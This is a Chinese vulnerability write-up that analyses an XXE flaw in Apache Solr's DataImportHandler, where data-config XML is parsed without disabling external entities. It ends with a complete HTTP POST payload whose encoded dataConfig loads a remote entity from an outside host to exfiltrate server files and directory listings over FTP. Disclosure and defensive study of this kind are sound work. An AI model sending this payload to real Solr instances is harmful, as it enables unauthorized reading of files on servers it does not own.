敏信审计系列之Apache-solr框架

栏目: 数据库 · 发布时间: 6年前

内容简介:Author:jkgh006@敏信安全审计​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。是一个独立的企业级搜索应用服务器,目前很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。​ 参考链接:

Author:jkgh006@敏信安全审计

Apache Solr框架简介

​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。是一个独立的企业级搜索应用服务器,目前很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。

​ 参考链接: https://lucene.apache.org/solr/

前言

​ 有几个朋友反映这个框架很多src都在使用,也是一个偶然的机会在对某厂商做测试的时候发现这个东西,使用范围还是挺广的,这一课我们就对它进行分析。

全版本目录列表/文件读取

根据官网给出来的默认配置如下web.xml

<filter-mapping>
  <!--
    NOTE: When using multicore, /admin JSP URLs with a core specified
    such as /solr/coreName/admin/stats.jsp get forwarded by a
    RequestDispatcher to /solr/admin/stats.jsp with the specified core
    put into request scope keyed as "org.apache.solr.SolrCore".

    It is unnecessary, and potentially problematic, to have the SolrDispatchFilter
    configured to also filter on forwards.  Do not configure
    this dispatcher as <dispatcher>FORWARD</dispatcher>.
  -->
  <filter-name>SolrRequestFilter</filter-name>
  <url-pattern>/*</url-pattern>
</filter-mapping>

一般这一类框架都是基于filter编写的,分析一下SolrDispatchFilter.classes

在doFilter方法里面看到这一句函数调用

this.handleAdminRequest(req, response, handler2, solrReq);

敏信审计系列之Apache-solr框架

跟进 RequestHandlerBase

敏信审计系列之Apache-solr框架

走到这里通过ide查看一下实现这个方法的类具体有哪些

敏信审计系列之Apache-solr框架

这里重点看其中的一个实现类DataImportHandler.clasess

敏信审计系列之Apache-solr框架

看到这里可能有人会问你这个是debug模式的,仔细分析,是不是debug他都会调用this.importer.runCmd方法

DataImporter.classes

敏信审计系列之Apache-solr框架

看看这个loadDataConfig的具体实现

敏信审计系列之Apache-solr框架

从这里可以看出来采用的是DocumentBuilder进行了xml的解析,但是并没有做外部实体禁用操作

肯定是存在xxe漏洞,那么进一步测试

  1. 采用gohper协议

    敏信审计系列之Apache-solr框架

    显示不支持此协议,可能与我环境上下文有关系

  2. 采用http协议

    敏信审计系列之Apache-solr框架

    这里抛异常说是连接断开了,通过后台的日志我们可以发现http协议是支持的并且读到了目录

    敏信审计系列之Apache-solr框架

    导致这个原因的代码如下:

    敏信审计系列之Apache-solr框架

    这个位置有一个try catch操作,一旦发现有特殊字符回车换行之类的就抛异常,当发生异常时候this.config就是个null,系统就断开连接,一定程度,规避了这个问题。但是这个不是目的,目的就是要读到文件和目录。

  3. 采用ftp协议

    构造一个ftp的payload

    敏信审计系列之Apache-solr框架

    启动一个ftp服务

    敏信审计系列之Apache-solr框架

    发送数据包

    敏信审计系列之Apache-solr框架

    成功返回

    敏信审计系列之Apache-solr框架

Payload:

POST /test1/dataimport HTTP/1.1
   Host: localhost:8080
   Content-Length: 281
   Accept: application/json, text/javascript, */*; q=0.01
   Origin: http://localhost:8080
   X-Requested-With: XMLHttpRequest
   User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
   Content-Type: application/x-www-form-urlencoded
   Referer: http://localhost:8080/
   Accept-Language: zh-CN,zh;q=0.8
   Cookie: k4la_2132_lastcheckfeed=1%7C1491801899; k4la_2132_nofavfid=1
   Connection: close

   command=full-import&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2Fxxe.boomeye.com%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E

总结

1. 对于solr的应用程序,每一个实例的访问应该添加授权机制,防止信息泄露和未授权调用
2. 对于xml的解析,在官方没有给出修复版本的情况下,采用waf解决

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

The Hard Thing About Hard Things

The Hard Thing About Hard Things

Ben Horowitz / HarperBusiness / 2014-3-4 / USD 29.99

Ben Horowitz, cofounder of Andreessen Horowitz and one of Silicon Valley's most respected and experienced entrepreneurs, offers essential advice on building and running a startup—practical wisdom for ......一起来看看 《The Hard Thing About Hard Things》 这本书的介绍吧!

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具